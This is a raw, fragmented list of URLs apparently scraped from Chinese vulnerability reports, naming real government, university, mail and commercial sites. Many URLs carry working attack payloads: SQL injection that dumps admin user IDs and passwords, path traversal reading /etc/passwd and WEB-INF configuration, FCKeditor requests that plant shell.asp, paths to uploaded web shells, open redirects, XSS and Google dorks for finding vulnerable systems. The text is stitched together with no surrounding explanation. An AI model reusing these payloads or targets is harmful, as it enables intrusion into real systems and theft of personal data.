http://www.114mall.com.cn/exchangecenter/CommodityInfo.aspx?ID=26639&seqid=49859 http://www.tongfangpc.com/MicroFilm/Default.aspx活动页面注册任意用户可上传任意文件 http://www.bt49.com http://xxgk.sihong.gov.cn/zfxxgk/subjectinfo.jsp?subjectbm= http://demo.kesion.com/ http://wiki.ubuntu.org.cn http://www.smecf.gov.cn/editor/Dialog/play.asp?raiz=E:\WWWROOT\SME\Editor http://www.shypost.com/ http://webscan.360.cn/vul/view/vulid/1944) http://www.dcsti.gov.cn/ProductShow.asp?ID=180 http://www.minmetalsland.com/fanti/productshow.asp?id=529 http://www.tcgcn.com/productshow.asp?id=517 http://www.laserbtb.com/productshow.asp?id=83 http://www.adingxiu.com/productshow.asp?id=1007 http://www.hotou.com.cn/productshow.asp?id=178 http://www.eheim.cn/productshow.asp?id=115 http://www.yinlongguolu.com/ProductShow.asp?id=375 http://www.shypost.com/ http://api.t.iqiyi.com/qx_api/framework/all_in_one?data={%22requests%22:[{%22uri%22:%22/comment/get_user_simple_info%22 http://www.qdgjj.com/ http://www.qdgjj.com:8080/grcx/gjindex.aspx http://www.qdgjj.com:8080/发现存在目录遍历,有备份文件可下载~对.net不是很熟悉,所以不知道这个备份文件价值有多高~信息有多敏感,但是像这样一个关系着个人敏感信息(工作单位、身份证号、姓名、公积金信息等)的网站存在目录遍历是很危险的! http://www.netgather.com/ http://www.iprima.com.cn/products_detail.asp?ID=455 http://site.aweb.com.cn/queryWebSiteList.action http://oa.fxedu.cn:8080/eeoa/loginCheckPersonAction.action http://www.nj29jt.net:98/eeoa/loginCheckPersonAction.action http://60.10.2.7/eeoa/loginCheckPersonAction.action http://122.228.156.7/eeoa/loginCheckPersonAction.action http://120.193.248.122/eeoa/loginCheckPersonAction.action https://mail.xxx.com/down.php?netdisk=1 http://sale.chinaedu.com/admin http://my.zhaopin.com/loginmgr/login_from_email.asp http://jt081311.qy01.cn/main1.asp?pid=0 www.scatc.net GOOGLE:inurl:/jwweb/ http://www.xz12348.gov.cn/baselogin/Login_login.action http://www.bankuandai.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat%28userid,0x23,pwd%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 http://gacfiatauto.hz.letv.com/ site:gacfiatauto.hz.letv.com http://gacfiatauto.hz.letv.com/php/voguserlist.php?callback=?&tel= http://gacfiatauto.hz.letv.com/php/vogusernum.p%20hp?callback=?&tel=5 http://211.68.196.67:808/poweb/asearch.do?LanguageType=0&status=showpage http://211.68.196.67:808/poweb/asearch.do?Langu http://sqlmap.org http://lvyou.elong.com/里的游记评论处,如下图所示: http://www.cnzz.com/ http://bbs.cnzz.com/home.php?mod=space&do=profile&uid=1 http://nokiabbs.cnmo.com/thread-14730559-1-1.html http://www.ahwst.gov.cn:8011/syhl/login.asp http://www.ahwst.gov.cn/dengjios/ http://www.mjwhw.gov.cn http://member.aili.com http://member.aili.com/index.php?a=search&c=content&channel=&fromTime=1&m=arc&title=Mr.&toTime=&type=arc http://member.aili.com/index.php?a=search&c=content&channel=&fromTime=1&m=arc&title=Mr.&toTime=%d5%27%d5%22&type=arc http://www.yfidea.com/product.asp http://demo.yfidea.com/ http://www.yfidea.com/AnLi.asp http://oa.bh5z.net/Index.asp http://222.178.145.174:8000/Index.asp http://oa.gz65.com/ http://hsoa.bgyhs.net/ http://www.xmqwzx.com/Index.asp http://oa.lhljzx.com/ url:/plus/flink_add.php xxx.com/SB/Student/ReportStudentList.aspx?CellID= xxx.com/BG/Mail/UMessageBrowse.aspx?mailid=XXX http://210.40.176.100/index.asp http://nlearning.hnswxy.com/index.asp http://222.240.135.75:8083/index.asp http://220.168.40.22:81/index.asp http://220.168.31.38:2000/contr.asp http://jxhd.yxnzy.net/index.asp http://58.20.60.38:2000/index.asp http://211.81.174.140/AddBookCart.aspx?ID=844565 http://219.242.65.10/ResourceList.aspx?SectionId=0e282b34-70f7-44ab-b56a-272f4cfa73f5 http://219.242.65.10/Donate.aspx?SectionId=5164f247-5ce1-4df1-8693-5d9c0bd6797e http://219.242.65.10/LeaveWordTwoList.aspx?SectionId=9a7eef33-7edf-4a2b-8d99-ffe2e6ed61d7 http://219.242.65.10/ArticleList.aspx?SectionId=e02620e9-a0ff-48b9-94c6-9539e39eff81 http://219.242.65.10/ResourceShow.aspx?SectionId=0e282b34-70f7-44ab-b56a-272f4cfa73f5&ResId=3ea39c3b-e529-4244-944a-b2c5fcd5030f http://219.242.65.10/DownLoad.aspx?SectionId=1aec0439-b552-4827-959b-f2a1a617d6d5 http://shrichinamobile.hiall.com.cn/cm/arrange.php?place=4 http://dev.home.sohu.com/common/ http://dev.home.sohu.com/common/400/ http://localhost/tmw/8/viewfile/account.xml?type=gl&logtype=../../turbomail/accounts/root/postmaster(你想要读密码的用户名)&sessionid=此处需普通用户sessionid http://localhost/tmw/8/mailmain?type=restorebackup&filename=/tmbackup2014-05-17_18_10_1.php&sessionid=此处需普通用户sessionid&intertype=ajax http://www.lnrkw.gov.cn/newsshow.asp?ArticleID=396 http://地址/conf/servlet/outputdb?parentid=0 http://111.160.55.180:18080/conf/servlet/outputdb?parentid=0 http://223.252.196.130/common/web_meeting/index.php?module=meeting_info&userId=1&siteId=10&meetingType=2&meetId=813332349 http://www.youyax.com/ http://down.chinaz.com/soft/33435.htm http://cert.unionpay.com/company/en/register?lang=../../../../WEB-INF/web.xml http://cert.unionpay.com/company/en/register?lang=../../../../WEB-INF/classes/data/import-data.sql http://cert.unionpay.com/company/en/register?lang=../../../../WEB-INF/classes/sql/h2/schema.sql http://cert.unionpay.com/company/en/register?lang=../../../../WEB-INF/classes/application.properties http://www.turbomail.org/download.html http://klas.cuit.edu.cn/ http://www.handbb.com/ckfinder/ckfinder.html http://wap.handbb.com/caidan.jsp?gid=19 http://plx.hz.letv.com/ http://plx.hz.letv.com/php/plxtpadd.php?callback=jQuery1710625948480097577_1400496281923&tpid=5&_=1400496312754 http://210.22.5.78/web/login_normal.php http://rukou.xzkd.com/logon.do http://abt.clbs.cn/abt/home/login.action http://t.soufun.com/post_add.php?&post_content=这里是内容 http://t.soufun.com/follow_add.php?follow_id=此处为注册用户ID&iframe=1&random=0.7860255646232082 http://t.soufun.com/follow_add.php?follow_id=46661553&iframe=1&random=0.9105442526532137 http://t.soufun.com/post_add.php?&post_content=%B5%F0%B1%AC%C1%CB%A3%AC%C1%C1%CF%B9%C1%CB%CE%D2%B5%C4%32%34%4B%EB%B4%20%BD%F0%B9%B7%D1%DB%68%74%74%70%3A%2F%2F%6A%69%6E%74%61%69%6C%69%73%68%65%2E%73%6F%75%66%75%6E%2E%63%6F%6D%2F%62%62%73%2F%31%30%31%30%37%33%37%30%34%39%7E%2D%31%2F%31%38%36%30%35%36%31%39%37%5F%31%38%36%30%35%36%31%39%37%5F%32%2E%68%74%6D%D5%E2%BE%B9%C8%BB%CA%C7%40%D3%EE%D6%E6%B5%DA%D2%BB%B4%F3%CB%A7%B8%E7&andComment=&toweibo=&oldComment=&pic_path=&7990988821018783 http://t.soufun.com/pm_add.php?&pm_content=这里是内容&reader_uid=这里是用户ID&reader_name=&695832881602396 http://122.224.8.3/admin/ADedit.aspx http://122.224.8.3/admin/knowledge.aspx http://122.224.8.3/Default_20080624.aspx http://122.224.8.3/nbb/wiki.aspx?wid=3034%20and%201=1 http://122.224.8.3/nbb/wiki.aspx?wid=3034%20and%201=2 http://qun.qq.com/manage.html#click http://www.qzdatasoft.com/ http://www.qzdatasoft.com/cgal.html http://**.**.**/Login_xsmm.asp_ http://**.**.**/Login_xsmm.asp_ http://**.**.**/Login_xsmm.asp_ http://**.**.**/oa/Login_xsmm.asp_ http://**.**.**/jw/Login_xsmm.asp_ http://**.**.**/jiaowu/ https://auth.alipay.com/login/logout.htm?goto= https://auth.alipay.com/login/logout.htm?goto=jianzhan.www.net.cn/product/TryoutTop?id=199%26t%3d%26u%3dhttp%3a//前往域名 https://auth.alipay.com/login/logout.htm?goto= jianzhan.www.net.cn/product/TryoutTop?id=199&t=&u=http://前往地址 http://www.dssoft.cn http://192.168.90.206/home.php?id=1 http://192.168.90.206//home.php?id=1 http://sqlmap.org http://cst365.com/login.action http://cst365.com/test.txt http://www.camra2006.org.cn/admin/News/InfoEdit.aspx?iProject=5&iInfoID=396 http://www.chinanetcenter.com/Home/CsLogin http://cma.org.cn/sysinfo.html http://mail.gduf.edu.cn/sysinfo.html http://mail.nbradio.com/sysinfo.html http://mail.workercn.cn/sysinfo.html http://mail.eqsc.gov.cn/sysinfo.html http://mail.shutcm.com/sysinfo.html http://222.44.47.137/sysinfo.html http://210.45.208.2/sysinfo.html http://run.wstp8.com/js_talk.php?bid=2190&btype=1 http://run.wstp8.com/js_talk.php?bid=2190&btype=1 http://www.sqlmap.org http://drops.wooyun.org/webview.html) http://www.55.la/run/ding_banner.php?bid=21022 http://www.55.la/run/ding_banner.php?bid=21022 http://www.sqlmap.org www.55.la\session http://www.2977.com/card/getservers.aspx?gameCode=1 http://www.2977.com/card/getservers.aspx?gameCode=1 http://www.sqlmap.org www.2977.com\session inurl:infos.php site:gov.cn inurl:hwcrm inurl:hwcrm site:edu.cn 1.www.xhfda.gov.cn/xhsp/msg.php?todo=add 2.www.kazx.com.cn/msg.php?todo=add 3.www.dasi.gov.cn/zhuanti/msg.php?todo=add http://www.tzhuawang.com/msg.php?todo=add http://www.xhfda.gov.cn/xhsp/infos.php?two=85 http://www.tzhuawang.com/infos.php?two=40 http://www.xhfda.gov.cn/xhsp/msg.php?todo=add www.aibang.com/?area=bizpay&cmd=card&id=1 http://account.us.changyou.com/ http://cde.us.changyou.com/ http://buglist.demo.xiaoi.com/zentao/user-login.html http://127.0.0.1/zentao/editor-edit-RDpceGFtcHBcemVudGFvXG1vZHVsZVxhY3Rpb25cbW9kZWwucGhwXGNyZWF0ZQ==-extendModel-.html http://127.0.0.1/zentao/editor-edit-RDpceGFtcHBcemVudGFvXHd3d1xkYXRhXHVwbG9hZA==-newExtend-.html http://127.0.0.1/zentao/data/upload/muma.php inurl:/web_news/DownClassList.aspx www.xszbjyw.com:82 http://www.xszbjyw.com:82 http://202.114.89.64/tingbookall.aspx?c=145951 http://61.136.150.170:8090/tingbookall.aspx?c=18845 http://www.hglib.cn:8077/mobile/BookList.aspx?Typeid=1-1-1 inurl:messageShow!show.action http://www.iactive.com.cn/acenter/index.action http://www.cccf.com.cn/getIndex.do http://www.cccf.com.cn/net/pages/download.jsp?path=uploads%5C2013%5C04%5C11%5C1310185844586.doc&name=%C3%F0%BB%F0%C6%F7%B2%FA%C6%B7..doc http://www.cccf.com.cn/net/pages/download.jsp?path=/net/pages/download.jsp http://dealer.yuncars.cn站点下, http://dealer.yuncars.cn/install.php http://www.dqfcj.com.cn/index.net.xml http://www.dqfcj.com.cn/maintainAction.do?method=init http://jxt.yb10010.com/Public/ShowDetail.aspx?LB=2&ID=267,ID存在注入 http://jxt.yb10010.com/Public/JxtLoginS.aspx site:ptfwzx.gov.cn http://116.255.247.133 intext:SULCMIS http://lib.szsy.cn/xxb/overduebooks.aspx?page= http://lib.szsy.cn/xxb/changepas.aspx http://xxgk.sihong.gov.cn/zfxxgk/serviceobjectinfo.jsp?s http://www.yfidea.com/product.asp http://demo.yfidea.com/ http://www.yfidea.com/AnLi.asp http://oa.bh5z.net/Index.asp http://222.178.145.174:8000/Index.asp http://oa.gz65.com/ http://hsoa.bgyhs.net/ http://www.xmqwzx.com/Index.asp http://oa.lhljzx.com/ http://t.qq.com/shouji132180089135 www.chinacntv.com/data/data.rar https://cdngwbn.115.com inurl:mafen.asp http://221.181.233.195:10003/bookxian.asp?id=597752 http://221.181.233.195:10003/bookxian1.asp?id=597752 http://221.181.233.195:10003/bookxian.asp?id=597752 http://221.181.233.195:10003/bookxian.asp?id=597752 http://ts.gylyxx.com/bookxian.asp?id=521155 http://ts.gylyxx.com/bookxian.asp?id=521155 http://ts.gylyxx.com/bookxian1.asp?id=521155 http://ts.gylyxx.com/bookxian1.asp?id=521155 http://221.181.233.195:10003/down.asp?id=597752 http://221.181.233.195:10003/down.asp?id=597752 http://221.181.233.195:10003/down.asp?id=597752 http://ts.gylyxx.com/down.asp?id=521155 http://ts.gylyxx.com/down.asp?id=521155 http://221.181.233.195:10003/look.asp?fenlei=%BF%C6%C6%D5%B6%C1%CE%EF%A1%A4%C9%FA%CE%EF%BF%C6%D1%A7&mingcheng=597752 http://221.181.233.195:10003/look.asp?fenlei=%BF%C6%C6%D5%B6%C1%CE%EF%A1%A4%C9%FA%CE%EF%BF%C6%D1%A7&mingcheng=597752 http://221.181.233.195:10003/look.asp?fenlei=%BF%C6%C6%D5%B6%C1%CE%EF%A1%A4%C9%FA%CE%EF%BF%C6%D1%A7&mingcheng=597752 http://ts.gylyxx.com/look.asp?fenlei=%BF%C6%C6%D5%B6%C1%CE%EF%A1%A4%C9%FA%CE%EF%BF%C6%D1%A7&mingcheng=597752 http://ts.gylyxx.com/look.asp?fenlei=%BF%C6%C6%D5%B6%C1%CE%EF%A1%A4%C9%FA%CE%EF%BF%C6%D1%A7&mingcheng=597752 http://221.181.233.195:10003/default.asp http://221.181.233.195:10003/default.asp http://221.181.233.195:10003/default.asp http://ts.gylyxx.com//default-yuan.asp http://www.shkrsoft.com/ http://www.shkrsoft.com/yanshi/onlinetest.asp http://113.128.254.170:8088/OA/login.aspx http://113.128.254.170:8088/oa/erp/SelectObject/SelctProviderName.aspx http://www.jh.org.cn/plus/flink_add.php提交表单后截包,将exp加进去 http://www.fwzxshijiazhuang.gov.cn/FAQ/FaqLoading.aspx?id= inurl:TransactList.aspx?ItemName= http://60.211.195.50/Login/TransactList.aspx?ItemName=%27 http://www.e.lfang.gov.cn/LangChao.ECGAP.OutPortalZX/login/TransactList.aspx?ItemName= http://www.fwzxshijiazhuang.gov.cn/Broadcast/BroadcastVi http://www.fwzxshijiazhuang.gov.cn/login/Log.aspx?loginname= http://202.100.98.9/view.php?db=dongtai&id=5 https://github.com/loveymond/my-fw/blob/dc96463f33b63b4e66286778d58b3544bd0ebd41/application/helpers/smtp_helper.php inurl:fsmcms btgaj.gov.cn/fsmcms/sites/main/select.jsp?select_value=FJ_QS http://www.gujing.com:82/admin/upload.htm http://61.136.150.170:8090/main.aspx http://61.136.150.170:8090/default.aspx http://61.136.150.170:8090/user/user_info.aspx?id=14 http://61.136.150.170:8090/user/user_info.aspx?id=14 http://61.136.150.170:8090/user/user_info.aspx?id=14 http://61.136.150.170:8090/user/user_info.aspx?id=14 http://61.136.150.170:8090/user/user_info.aspx?id=14 http://oa.bnuz.edu.cn:8080/admin/login/logon.jsp https://www.google.com.hk/search?newwindow=1&safe=strict&es_sm=91&biw=1153&bih=634&q=intitle%3A%E5%A4%A9%E6%96%B9%E6%9C%89%E5%A3%B0%E6%95%B0%E5%AD%97%E5%9B%BE%E4%B9%A6%E9%A6%86&oq=intitle%3A%E5%A4%A9%E6%96%B9%E6%9C%89%E5%A3%B0%E6%95%B0%E5%AD%97%E5%9B%BE%E4%B9%A6%E9%A6%86&gs_l=serp.12...444855.444855.0.445405.1.1.0.0.0.0.0.0..0.0....0...1c.2.44.serp..1.0.0.8rqx6v7LP-I http://61.136.150.170:8090/user/user_history.aspx?id=14 http://61.136.150.170:8090/user/user_history.aspx?id=14 http://61.136.150.170:8090/user/user_history.aspx?id=14 http://www.pageadmin.net/ https://www.google.de/#newwindow=1&q=PageAdmin+CMS,++All+Rights+Reserved&start=90 http://www.youlu888.com/e/install/index.aspx http://www.youlu888.com/e/install/index.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExODcwMDU5OTgPZBYCAgEPZBYCAgMPFgIeB1Zpc2libGVoZGQ%3D&ctl02=%E8%BF%90%E8%A1%8CSQL http://www.e-tiller.com/ch/index.aspx inurl:first_menu.aspx、inurl:view_abstract.aspx http://jse.***.edu.cn/ch/guestbook/Login.aspx http://www.***.com.cn/ch/guestbook/Login.aspx http://www.***na.net/ch/guestbook/Login.aspx http://www.c***m.com.cn/ch/guestbook/Login.aspx http://xuebao.***.edu.cn/ch/guestbook/Login.aspx http://ahndskxb.***u.edu.cn/ch/guestbook/Login.aspx http://www.mod***dar.cn/ch/guestbook/Login.aspx http://www.dongfangtai.com/ http://www.51auto.com/ http://fengyun.kugou.com/news/list?cid=1311&page=2 https://github.com/binzh/sdpqa/blob/master/config/environments/production.rb https://github.com/liutaihua/cldisky/blob/master/t/readconf.py https://github.com/syshack/NeverMore/blob/master/zeus.wpu http://61.136.150.170:8090/user/user_admin.aspx http://wooyun.org/bugs/wooyun-2010-061673 http://61.136.150.170:8090/default.aspx http://wooyun.org/bugs/wooyun-2010-061673 http://61.136.150.170:8090/user/user_info.aspx?id=1 http://61.136.150.170:8090/user/user_forgetpwd.aspx data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== http://tradeunion.tju.edu.cn/board.php?field=advice&id=93290 http://tradeunion.tju.edu.cn/board.php?field=ad http://www.youlu888.com/e/zt/ http://kf.sf-express.com/css/myquery/queryWQSBill.action# clsid:A38F2B9A-2DD3-4C88-86EE-15C01EB565EA http://bj.baidupcs.com/file/8afe498c9f126015a70ae0c3ce1a9b63?fid=3675168192-250528-678972838405721&time=1400665296&sign=FDTAXER-DCb740ccc5511e5e8fedcff06b081203-MfWZ2p8aIRiyTWAdPJp9n8qZ9fU%3D&to=bb&fm=N,B,U,nc&newver=1&expires=1400665896&rt=sh&r=805615569&logid=841455764&sh=1&vuk=3675168192&fn=ftpfuzz.exe https://github.com/walker01/sometools/blob/3755706e3b773d55225798283e0144e42fa5cc19/deploy/develope.log.md https://github.com/hengxingwuji/ http://www.xinpop.cn/) http://www.xinpop.cn/Customer_Example.html inurl:shownews.asp?newsid inurl:shownews.asp?id http://jwc.xinpop.com.cn/shownews.asp?pkId=103&newsid=1419 http://smesy.xidian.edu.cn/shownews.asp?newsid=1090 http://nec.snnu.edu.cn/shownews.asp?id=372 http://www.shanxi185.com/shownews.asp?id=1491 http://tiyubu.xpu.edu.cn/shownews.asp?id=417 inurl:asp site:edu.cn】 http://www.xsc.snnu.edu.cn/YuanBu_elegant_demeanour.asp?id=17&bh=10919 http://jw.xpu.edu.cn/Teachers_service.asp?id=20&bh=133 http://www.wyxy.snnu.edu.cn/News.asp?id=18&bh=114 http://biology.nwu.edu.cn/College_News.asp?id=25&bh=591 http://ysxy.nwu.edu.cn/News_Center.asp?id=137&bh=249 http://mainpage2.nwu.edu.cn/cjy/Dynamic_test.asp?id=38&bh=40 http://gzc.xidian.edu.cn/Download_Center.asp?bh=98&id=23 http://www.ibs.snnu.edu.cn/Student_worker_dynamic.asp?id=31&bh=816 http://math.xidian.edu.cn/The_News.asp?id=36&bh=155 http://sklsp.nwpu.edu.cn/Shiyanshi_News.asp?id=13&bh=95 http://jijianchu.snnu.edu.cn/Work_dynamic.asp?id=16&bh=298 http://whe.xaut.edu.cn/Notice.asp?id=25&bh=440 http://jwc.xinpop.com.cn/shownews.asp?pkId=103&newsid=1419 http://jwc.xinpop.com.cn/shownews.asp?pkId=103&newsid=1419 http://smesy.xidian.edu.cn/shownews.asp?newsid=1090 http://smesy.xidian.edu.cn/shownews.asp?newsid=1090 http://service.weibo.com/share/share.php?url=http://127.0.0.1:80 lwjs.kugou.com/news/list?cid=1343 http://www.hb-n-tax.gov.cn/为国税局主页。 http://219.140.162.53:8001/website/downloadcenter.htm?method=getMore&wjlxDl=2 http://www.74cms.com/ Version:V4.5 www.zjyzkf.com/_jbrcms/%23JbrCMSDB/%23JbrData.mdb http://publish.tju.edu.cn/showMessage.do?method=showMessage&article_id=1143 http://jxsjjx.tju.edu.cn/news/CodeIgniter/tianda.php?d=front&c=fileshow&m=filedetail&id=25 http://mse.tju.edu.cn/content.php?block=a1 http://gs.tju.edu.cn/yjspy/py2013/kc_list.asp?xydm=117 http://gs.tju.edu.cn/zyb/news_detail.asp?id=808 http://gs.tju.edu.cn/xw/readnews.asp?NewsID=271 http://gs.tju.edu.cn/xw/ywjd/Readyw.asp?NewsID=30 http://salon.yonyou.com http://salon.yonyou.com/AppWeb/FuWuCP/FuWuCP_list.aspx?BianHao=AUTON060628000002 http://salon.yonyou.com/AppWeb/FuWuCP/FuWuCP_list.aspx?BianHao=AUTON060628000002%20and%201=1 http://salon.yonyou.com/AppWeb/FuWuCP/FuWuCP_list.aspx?BianHao=AUTON060628000002%20and%201=2 http://health.yonyou.com/readme.txt http://health.yonyou.com http://health.yonyou.com/ok.php http://www.diancms.com/Model/10.aspx http://www.5156yuwen.com/user/login.aspx https://github.com/mayhope/diaoyu/blob/01cf9eae8ada01a02469a8f3a8c93469bedc4188/libs/model/BaseModelMailer.php https://github.com/topweibo/master/blob/1d739aa16297af932c36a50f8433feda31074c5a/common/weibo.py http://demo.idcsystem.net/server.html?pg=0 http://demo.idcsystem.net/server.html?pg=0 http://www.sqlmap.org https://www.google.com.hk/search?q=inurl:Course_List.aspx?typeid= http://shop2.pmway.com/Goods/Search.aspx?isTop=true&searchValue=dudu http://www.0370edu.com/wap/index.php?mod=store&userid=chunmiao http://demo.vbmcms.com/wap/index.php?mod=store&userid=chunmiao http://demo.vbmcms.com/wap/index.php?mod=store&userid=chunmiao http://www.sqlmap.org www.youyax.com/download.php www.youyax.com/download.php?name=../../../../../../../../../../etc/passwd www.youyax.com/download.php?name=../../../../../../../../../../etc/resolv.conf www.youyax.com/download.php?name=../index.php http://www.hbxzzx.gov.cn/admin/login.jsp,如图 http://125.35.5.6:9000/ http://demo.ssfall.com/ads.asp?ad=8 http://demo.ssfall.com/ads.asp?ad=8 http://www.sqlmap.org http://www.zzeq.gov.cn:803/cn/login.html inurl:Column.aspx?ColId=2 http://chem.jlu.edu.cn/chemistry/science.php?id=103&&cid=4 inurl:TransactList.aspx?ItemName= http://moffice.wo.com.cn/shop_show.php?MenuID=2&CaseID=7 inurl:TransactList.aspx?ItemName= http://tieba.baidu.com/f/commit/share/openShareApi?url=http://www.wooyun.org/ http://sba.ahu.edu.cn/db.rar http://www.bjgjj.gov.cn/wsyw/wscx/gjjcx-edit.jsp直接去修改默认密码,就可以通过身份证号去登陆了,需要通过GET提交bh参数,值其实就是身份证号+00 http://www.bjgjj.gov.cn/wsyw/wscx/modfy.jsp?bh=MTEwMXXXXXXXXXXEyMDg2MTQ2MDA= http://www.bjgjj.gov.cn/wsyw/wscx/gjjcx-edit.jsp?bh=MTEwMXXXXXXXXXXEyMDg2MTQ2MDA= http://www.bjgjj.gov.cn/wsyw/wscx/modfy.jsp?bh=MTEwXXXXXXNDEyMDg2MTQ2MDA= http://www.bjgjj.gov.cn/wsyw/wscx/js/Encrypt.js http://niclab.bupt.edu.cn/ http://niclab.bupt.edu.cn:8080/article/boot_index.php http://www.meilishuo.com/activity/tuan/tg512/?event_id=1015 http://mapp.meilishuo.com/activity/tuan/tg512/?event_id=1015 site:bbs.kaspersky.com.cn inurl:profile http://preorder.smartisan.com/ http://share.*.taobao.com/share/addShare.htm?title=&url=http://www.wooyun.org https://github.com/chengang/tmpWorks/blob/master/inotify.pl http://mas.cipg.org.cn/serverLog.do http://221.178.218.122:8001/serverLog.do http://221.178.131.250/serverLog.do http://wd.koudai.com/vshop/1/H5/H5ShopInfo.php?userid=52&callback=jsonpcallback_1400737639575_8703400159720331&ver=51402 http://www.globenuist.cn/admin/AdminLogin.html https://114.80.121.120 http://www.yx667.com/(攸县生活网) http://www.hnyxrk.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.hnyxrk.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2Fshell.asp&NewFolderName=z http://www.hnyxrk.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.hnyxrk.com/upload/Media/shell.asp/20142722042707.jpg http://mail.xxx.com/webmail/getPass.php?email=Services@xxx.com&update=s http://mail.comingchina.com/webmail/getPass1.php?email=umailtry@comingchina.com&update=s http://mail.comingchina.com/webmail/getPass2.php?email=umailtry@comingchina.com&update=s http://tsw.lhk.gov.cn/ http://210.22.8.98/dwr/call/plaincall/DwrUserInfo.resetPassword.dwr?callCount=1&page=/forgot.action&httpSessionId=&scriptSessionId=1400608260581&c0-scriptName=DwrUserInfo&c0-methodName=resetPassword&c0-id=0&c0-param0=string:1111'&c0-param1=string:111@11.com&batchId=0&locale=zh_CN AdminID:Name:Password:RoleId Account:AppServerID:AppServerSN:AppServerType:AssignFlag:Capacity:Password:RecycleDay ServerID:UserID:UserName http://www.soft.u7pk.com/User_bbs.html http://www.njsdyyy.com/admin/login.jsp http://dynamic.app.m.letv.com/android/dynamic.php?starttime=&endtime=&deptid=&productid=&username=123456&act=queryrecord&ctl=index&day=0&mod=passport&pid=&pcode=010110329&query=02&version=5.0 http://www.changedu.com/ http://sy.cxxy.seu.edu.cn/这个为例 http://sy.cxxy.seu.edu.cn/syjx/index.aspx登录帐号入口 http://sy.cxxy.seu.edu.cn http://localhost/Sys/FrameWork/PlatForm/RemoteMethodCall.aspx http://localhost/index.aspx?events=logon¶meter=OA http://localhost//Sys/ExtControl//fckeditor//editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 http://localhost/Sys/ExtControl/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://localhost/Sys/ExtControl///fckeditor//editor/filemanager/connectors/aspx/connector.aspx http://mail.ggv.com.cn/login.php?Lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.php http://vip.hn118114.cn/locallife.aspx?T=wooyun http://vip.hn118114.cn/zhinan.aspx?Name=wooyun http://vip.hn118114.cn/locallife.aspx?T=wooyun http://home.inc.hc360.com/homenew/Home/View.aspx?Id=3980 http://www.ahhbly.gov.cn//main/model/newsoperation/webEditor/eWebEditor.jsp http://www.aqanhuisafety.gov.cn/main/model/newsoperation/webEditor/eWebEditor.jsp http://www.we7.cc/源码下载,量还是挺大的。验证为v0.52,漏洞应该是版本通杀。 http://bbs.we7.cc/forum.php?mod=viewthread&tid=1155 http://live.sports.ifeng.com/sports/schedule.php?format=js&matchids=“ http://live.sports.ifeng.com/sports/schedule.php http://sqlmap.org http://www.ifeng.com http://health.sxws.gov.cn/yypt/wsyygh/digitalPlatform.action http://jthkkcx.cic.tsinghua.edu.cn/hkjy.hkgl_hkjy.do http://www.laanhuisafety.gov.cn/main/model/newsoperation/webEditor/eWebEditor.jsp http://sakai.hhu.edu.cn/portal http://elearning.ujs.edu.cn/portal https://urp.swu.edu.cn/index.portal http://sakai.ynni.edu.cn/portal http://sakai.fudan.edu.cn:8080/portal http://sakai.sysu.edu.cn/portal http://sakai.umji.sjtu.edu.cn/portal http://cas.sias.edu.cn/portal http://chongqing.buynow.com.cn http://www.haitiansoft.com/default.asp http://oa.haitianoa.com/login.asp http://oa.haitianoa.com/login.asp http://www.fzsyxx.com/oa/ http://vos.tjufe.edu.cn/login.asp http://wooyun.org/bugs/wooyun-2010-049502 http://www.a.com/www.sohu.com/来绕过防御 http://www.haotianaobo.com/cases.aspx http://oademo.haotianaobo.com/ site:gov.cn http://job.10000114.com/shantou/jobinfo.aspx?uid=34354&city=1 http://gs.tju.edu.cn:8088/tuimian/ http://220.178.4.169/open/PyfaList.aspx?xsfl=22 http://www.xmhlkj.gov.cn/file/index.asp http://www.xmhlkj.gov.cn/z.aspx http://www.xmhlkj.gov.cn/ManageModule/Info/fckeditor http://www.fj.bnet.cn/Page/Tool.aspx http://117.27.135.242:8080/chanjet/do/taxlogin.php http://59.57.4.233:7080/icity.fj/ http://219.242.65.10/fsweb/HotBrowse.aspx?Call=E google:http://74.125.235.191/#newwindow=1&q=inurl:%2FHotBrowse.aspx http://opac.syphu.edu.cn:8080/HotBrowse.aspx?Call=k http://lib.sccm.cn:888/gdweb/HotBrowse.aspx?Call=b http://lib.xjnu.edu.cn:8000/HotBrowse.aspx?Call=B http://210.40.8.35:8080/HotBrowse.aspx?Call=E http://222.77.99.242:8088/HotBrowse.aspx?Call=TU http://119.7.***.***:9090/monitor/[2014-5-22]/059188388106-059188051023-1400752162.1835-174923.wav http://www.qixian.gov.cn/gcjs/Download.asp?ID=39 http://drops.wooyun.org/tips/2031说的问题很清楚我也不重复了,乌云的几个上传好像都没做文件内容的检查 http://www.baidu.com/www.wooyun.org/就成功了 http://www.wooyun.org/teams/(选这个没别的理由,就因为页面内容少。。速度快一点 www.wooyun.org的目录 http://xxx.com/www.wooyun.org/csrf.html丢到zone http://www1.gdufs.edu.cn/gwkyc/DownloadShow.asp?ID=17 http://supports.house.sina.com.cn/decor/2007 http://www.topsi.net.cn/ http://www.topsi.net.cn/case.php http://www.h***o.co/ http://www.c***n.com http://www.s***ng.com http://www.k***.gov.cn http://hefeng.***61.com http://www.m***ie.com.cn http://fy2.scctcm.edu.cn/DownloadShow.asp?ID=60 http://www.csjjcgs.cn/xxgl/tzgg_view.jsp?xh=321 http://www.csjjcgs.cn/xxgl/zcfg_view.jsp?xh=39 http://campus.chinaunicom.cn/ilearn/en/learner/jsp/login.jsp http://service.hunaniptv.com/zentaopms/www/index.php?m=user&f=login&referer=L3plbnRhb3Btcy93d3cv http://www.hbhggh.gov.cn/admin/login.aspx http://paoscholarship.zju.edu.cn/ggp_content.jsp?id=44 http://www.bjlqzx.com/ http://yto.21tb.com/ http://www.coolyi.net/khal/ inurl:nid= 